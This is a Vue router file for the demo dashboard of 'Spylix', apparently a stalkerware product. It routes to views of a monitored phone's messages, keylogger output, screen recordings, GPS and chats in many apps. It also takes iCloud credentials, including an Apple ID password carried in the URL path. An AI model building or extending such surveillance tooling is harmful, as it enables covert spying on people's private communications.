import Vue from 'vue'
import i18n from '@/langurage/i18n'
import Router from 'vue-router'
import index from '@/components/index'
import login from '@/components/login'
import password from '@/components/password'
import account from '@/components/account'
import system from '@/components/system'
import Forgot from '@/components/Forgot'
import Choos from '@/components/Choos'
import header from '@/components/header'
import Device from '@/components/Device'
import Applications from '@/components/Applications'
import Calls from '@/components/Calls'
import Text from '@/components/Text'
import Events from '@/components/Events'
import ChoosCopy from '@/components/ChoosCopy'
import Messages from '@/components/Messages'
import IMessages from '@/components/IMessages'
import Contacts from '@/components/Contacts'
import Notes from '@/components/Notes'
import Photos from '@/components/Photos'
import Videos from '@/components/Videos'
import Tracking from '@/components/Tracking'
import GPS from '@/components/GPS'
import Apps from '@/components/Apps'
import Browser from '@/components/Browser'
import BrowserHistory from '@/components/BrowserHistory'
import Email from '@/components/Email'
import WhatsApp from '@/components/WhatsApp'
import ShoppingCart from '@/components/ShoppingCart'
import Billing from '@/components/Billing'
import Setting from '@/components/Setting'
import TermsOfUse from '@/components/TermsOfUse'
import Guidance from '@/components/Guidance'
import Choose from '@/components/Choose'
import CanYou from '@/components/CanYou'
import Manufacturer from '@/components/Manufacturer'
import Take from '@/components/Take'
import YouWill from '@/components/YouWill'
import Select from '@/components/Select'
import Disable from '@/components/Disable'
import TwoFactor from '@/components/TwoFactor'
import And from '@/components/And'
import Enter from '@/components/Enter'
import Allow from '@/components/Allow'
import Verification from '@/components/Verification'
import SelectTheDevice from '@/components/SelectTheDevice'
import ok from '@/components/ok'
import Keylogger from '@/components/Keylogger'
import SimCard from '@/components/SimCard'
import GeoFencing from '@/components/GeoFencing'
import Website from '@/components/Website'
import WiFi from '@/components/WiFi'
// import index from '@/components/index'
import Snake from '@/components/Snake'
import Privagypolicy from '@/components/Privagypolicy'
// import padlerPay from '@/components/padlerPay'
import ShoppingCartCopy from '@/components/ShoppingCartCopy'
import screenRecording from '@/components/screenRecording'

const originalPush = Router.prototype.push
Router.prototype.push = function push (location) {
  return originalPush.call(this, location).catch((err) => err)
}
Vue.use(Router)
// let vm = new Vue()
let router = new Router({
  mode: 'history',
  routes: [
    {
      path: '/',
      name: 'home',
      component: login
    },
    {
      path: '/login',
      name: 'login',
      component: login
    },
    {
      path: '/resetpassword',
      name: 'password',
      component: password
    },
    {
      path: '/signup',
      name: 'account',
      component: account
    },
    {
      path: '/choosedevice',
      name: 'system',
      component: system
    },
    {
      path: '/forgotpassword',
      name: 'Forgot',
      component: Forgot
    },
    {
      path: '/purchase',
      name: 'Choos',
      component: Choos
    },
    {
      path: '/ShoppingCartCopy',
      name: 'ShoppingCartCopy',
      component: ShoppingCartCopy
    },
    {
      path: '/header',
      name: 'header',
      component: header,
      children: [
        {
          path: '/imessages',
          name: 'iMessages',
          component: IMessages
        },
        {
          path: '/devicemanagement',
          name: 'Device',
          component: Device
        },
        {
          path: '/appblock',
          name: 'Applications',
          title: 'App Block | Spylix',
          component: Applications
        },
        {
          path: '/calls',
          name: 'Calls',
          title: 'Calls | Spylix',
          component: Calls
        },
        {
          path: '/wifinetworks',
          name: 'Text',
          title: 'Wi-Fi Networks | Spylix',
          component: Text
        },
        {
          path: '/events',
          name: 'Events',
          title: 'Events | Spylix',
          component: Events
        },
        {
          path: '/purchasenewplan/:system?',
          name: 'ChoosCopy',
          component: ChoosCopy
        },
        {
          path: '/messages',
          name: 'Messages',
          title: 'Text Messages | Spylix',
          component: Messages
        },
        {
          path: '/contacts',
          name: 'Contacts',
          title: 'Contacts | Spylix',
          component: Contacts
        },
        {
          path: '/notes',
          name: 'Notes',
          title: 'Notes | Spylix',
          component: Notes
        },
        {
          path: '/photos',
          name: 'Photos',
          title: 'Photos | Spylix',
          component: Photos
        },
        {
          path: '/videos',
          name: 'Videos',
          title: 'Videos | Spylix',
          component: Videos
        },
        {
          path: '/keywordalerts',
          name: 'Tracking',
          title: 'Keyword Alerts | Spylix',
          component: Tracking
        },
        {
          path: '/gps',
          name: 'GPS',
          title: 'GPS Locations | Spylix',
          component: GPS
        },
        {
          path: '/installedapps',
          name: 'Apps',
          title: 'Installed Apps | Spylix',
          component: Apps
        },
        {
          path: '/bookmarks',
          name: 'Browser',
          title: 'Bookmarks | Spylix',
          component: Browser
        },
        {
          path: '/browserhistory',
          name: 'BrowserHistory',
          title: 'Browser History | Spylix',
          component: BrowserHistory
        },
        {
          path: '/email',
          name: 'Email',
          title: 'Email | Spylix',
          component: Email
        },
        {
          // path: '/whatsapp/:pkg?/:is3?',
          path: '/whatsapp',
          name: 'WhatsApp',
          title: 'WhatsApp | Spylix',
          component: WhatsApp
        },
        {
          // path: '/whatsapp/:pkg?/:is3?',
          path: '/wahtsappbusiness',
          name: 'WahtsAppBusiness',
          title: 'WahtsApp Business | Spylix',
          component: WhatsApp
        },
        {
          path: '/kik',
          name: 'Kik',
          title: 'Kik | Spylix',
          component: WhatsApp
        },
        {
          path: '/line',
          name: 'Line',
          title: 'LINE | Spylix',
          component: WhatsApp
        },
        {
          path: '/telegram',
          name: 'Telegram',
          title: 'Telegram | Spylix',
          component: WhatsApp
        },
        {
          path: '/viber',
          name: 'Viber',
          title: 'Viber | Spylix',
          component: WhatsApp
        },
        {
          path: '/tinder',
          name: 'Tinder',
          title: 'Tinder | Spylix',
          component: WhatsApp
        },
        {
          path: '/snapchat',
          name: 'Snapchat',
          title: 'Snapchat | Spylix',
          component: WhatsApp
        },
        {
          path: '/hangouts',
          name: 'Hangouts',
          title: 'Hangouts | Spylix',
          component: WhatsApp
        },
        {
          path: '/skype',
          name: 'Skype',
          title: 'Skype | Spylix',
          component: WhatsApp
        },
        {
          path: '/instagram',
          name: 'Instagram',
          title: 'Instagram | Spylix',
          component: WhatsApp
        },
        {
          path: '/facebook',
          name: 'Facebook',
          title: 'Facebook | Spylix',
          component: WhatsApp
        },
        {
          path: '/facebookmessenger',
          name: 'Messenger',
          title: 'Facebook Messenger | Spylix',
          component: WhatsApp
        },
        {
          path: '/tumblr',
          name: 'Tumblr',
          title: 'Tumblr | Spylix',
          component: WhatsApp
        },
        {
          path: '/badoo',
          name: 'Badoo',
          title: 'Badoo | Spylix',
          component: WhatsApp
        },
        {
          path: '/pof',
          name: 'POF',
          title: 'POF | Spylix',
          component: WhatsApp
        },
        {
          path: '/wechat',
          name: 'Wechat',
          title: 'WeChat | Spylix',
          component: WhatsApp
        },
        {
          path: '/qq',
          name: 'QQ',
          title: 'QQ | Spylix',
          component: WhatsApp
        },

        {
          path: '/signal/:pkg?/:is3?',
          name: 'Signal',
          title: 'Signal | Spylix',
          component: WhatsApp,
          needLogin: true,
          needBind: true
        },
        {
          path: '/x/:pkg?/:is3?',
          name: 'X',
          title: 'X | Spylix',
          component: WhatsApp,
          needLogin: true,
          needBind: true
        },

        {
          path: '/zoom/:pkg?/:is3?',
          name: 'Zoom',
          title: 'Zoom | Spylix',
          component: WhatsApp,
          needLogin: true,
          needBind: true
        },

        {
          path: '/tiktok/:pkg?/:is3?',
          name: 'Tiktok',
          title: 'Tiktok | Spylix',
          component: WhatsApp,
          needLogin: true,
          needBind: true
        },

        {
          path: '/reddit/:pkg?/:is3?',
          name: 'Reddit',
          title: 'Reddit | Spylix',
          component: WhatsApp,
          needLogin: true,
          needBind: true
        },

        {
          path: '/trillian/:pkg?/:is3?',
          name: 'Trillian',
          title: 'Trillian | Spylix',
          component: WhatsApp,
          needLogin: true,
          needBind: true
        },

        {
          path: '/linkedin/:pkg?/:is3?',
          name: 'LinkedIn',
          title: 'LinkedIn | Spylix',
          component: WhatsApp,
          needLogin: true,
          needBind: true
        },

        {
          path: '/slack/:pkg?/:is3?',
          name: 'Slack',
          title: 'Slack | Spylix',
          component: WhatsApp,
          needLogin: true,
          needBind: true
        },

        {
          path: '/imo/:pkg?/:is3?',
          name: 'IMO',
          title: 'IMO | Spylix',
          component: WhatsApp,
          needLogin: true,
          needBind: true
        },

        {
          path: '/kakaotalk/:pkg?/:is3?',
          name: 'KakaoTalk',
          title: 'KakaoTalk | Spylix',
          component: WhatsApp,
          needLogin: true,
          needBind: true
        },

        {
          path: '/discord/:pkg?/:is3?',
          name: 'Discord',
          title: 'Discord | Spylix',
          component: WhatsApp,
          needLogin: true,
          needBind: true
        },

        {
          path: '/keet/:pkg?/:is3?',
          name: 'Keet',
          title: 'Keet | Spylix',
          component: WhatsApp,
          needLogin: true,
          needBind: true
        },

        {
          path: '/ShoppingCart',
          name: 'ShoppingCart',
          component: ShoppingCart
        },
        {
          path: '/billing',
          name: 'Billing',
          component: Billing
        },
        {
          path: '/settings',
          name: 'Setting',
          component: Setting
        },
        {
          path: '/termsofuse',
          name: 'TermsOfUse',
          component: TermsOfUse
        },
        {
          path: '/privacypolicy',
          name: 'Privagypolicy',
          component: Privagypolicy
        },
        {
          path: '/setup',
          name: 'Guidance',
          component: Guidance
        },
        {
          path: '/choosedevice',
          name: 'Choose',
          component: Choose
        },
        {
          path: '/CanYou',
          name: 'CanYou',
          component: CanYou
        },
        {
          path: '/selectmanufacturer',
          name: 'Manufacturer',
          component: Manufacturer
        },
        {
          path: '/Take',
          name: 'Take',
          component: Take
        },
        {
          path: '/YouWill',
          name: 'YouWill',
          component: YouWill
        },
        {
          path: '/select',
          name: 'Select',
          component: Select
        },
        {
          path: '/install',
          name: 'Disable',
          component: Disable
        },
        {
          path: '/TwoFactor',
          name: 'TwoFactor',
          component: TwoFactor
        },
        {
          path: '/androidbindingsuccessful',
          name: 'And',
          component: And
        },
        {
          path: '/entericloudcredentials',
          name: 'Enter',
          component: Enter
        },
        {
          path:
            '/2stepverification/:equipment_id?/:user_id?/:apple_id?/:apple_pwd?',
          name: 'Allow',
          component: Allow
        },
        {
          path: '/verification',
          // /:equipment_id?/:user_id?/:apple_id?/:apple_pwd?
          name: 'Verification',
          component: Verification
        },
        {
          path: '/SelectTheDevice',
          name: 'SelectTheDevice',
          component: SelectTheDevice
        },
        {
          path: '/iosbindingsuccessful',
          name: 'ok',
          component: ok
        },
        {
          path: '/keylogger',
          name: 'Keylogger',
          title: 'Keylogger | Spylix',
          component: Keylogger
        },
        {
          path: '/simcard',
          name: 'SimCard',
          title: 'Sim Card | Spylix',
          component: SimCard
        },
        {
          path: '/geo-fencing',
          name: 'GeoFencing',
          title: 'Geo-fencing | Spylix',
          component: GeoFencing
        },
        {
          path: '/websiteblock',
          name: 'Website',
          title: 'Website Block | Spylix',
          component: Website
        },
        {
          path: '/wifiblock',
          name: 'WiFi',
          title: 'Wi-Fi Block | Spylix',
          component: WiFi
        },
        {
          path: '/Snake',
          name: 'Snake',
          component: Snake
        },
        {
          path: '/screenrecordings',
          name: 'screenRecording',
          title: 'Screen Recordings | Spylix',
          component: screenRecording
        },
        // {
        //   path: '/padlerPay',
        //   name: 'padlerPay',
        //   component: padlerPay
        // },
        {
          path: '/dashboard',
          name: 'index',
          title: 'Dashboard | Spylix',
          component: index
        }
      ]
    }
  ]
})
localStorage.setItem('token', '95751454-b52a-48d7-9723-8edc35b6abee')
localStorage.setItem('nickname', '')
localStorage.setItem(
  'avatar',
  'data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZlcnNpb249IjEuMSIgaGVpZ2h0PSIxMDAiIHdpZHRoPSIxMDAiPjxyZWN0IGZpbGw9InJnYigxNzQsMjI5LDE2MCkiIHg9IjAiIHk9IjAiIHdpZHRoPSIxMDAiIGhlaWdodD0iMTAwIj48L3JlY3Q+PHRleHQgeD0iNTAiIHk9IjUwIiBmb250LXNpemU9IjUwIiB0ZXh0LWNvcHk9ImZhc3QiIGZpbGw9IiNmZmZmZmYiIHRleHQtYW5jaG9yPSJtaWRkbGUiIHRleHQtcmlnaHRzPSJhZG1pbiIgZG9taW5hbnQtYmFzZWxpbmU9ImNlbnRyYWwiPkQ8L3RleHQ+PC9zdmc+'
)
localStorage.setItem('email', 'demo@spylix.com')
const flatArray = (list) => {
  let arr = []
  for (let i = 0; i < list.length; i++) {
    let temp = list[i]
    if (!temp.children) {
      arr = arr.concat([temp])
    } else {
      arr = arr.concat(flatArray(temp.children))
    }
  }
  return arr
}
let flatRouters = flatArray(router.options.routes)
let head = document.getElementsByTagName('head')
let meta = document.createElement('meta')
router.beforeEach(async (to, from, next) => {
  let toRouter = flatRouters.find((i) => i.name === to.name)
  // console.log(toRouter, 888)
  console.log(toRouter);
  document.title = i18n.t(toRouter.title + '.title') + ' ' + i18n.t('Demo')
  let meta = document.createElement('meta')
  meta.name = 'description'
  meta.content = i18n.t(toRouter.title + '.description') + ' ' + i18n.t('Demo')
  head[0].appendChild(meta)
  document.getElementsByTagName('body')[0].classList = to.name + '-Pager'
  // let status = localStorage.getItem('system-status')

  // let names = ['Billing', 'Device', 'Setting', 'Messages', 'Calls', 'Contacts', 'Events', 'Notes', 'Photos', 'Videos', 'Text', 'Tracking', 'Keylogger', 'Apps', 'GPS', 'Browser', 'Email', 'SimCard', 'WhatsApp', 'screenRecording', 'GeoFencing', 'Website', 'WiFi', 'Applications']
  if (to.fullPath === '/') {
    next({ name: 'index' })
  }
  next()
  //  去除验证
  // if (Number(status) === 1 || !names.includes(to.name)) {
  //   next()
  // } else {
  // vm.$message('Please bind your device')
  //   next({ name: 'Guidance' })
  // }
})
export default router



// WEBPACK FOOTER //
// ./src/router/index.js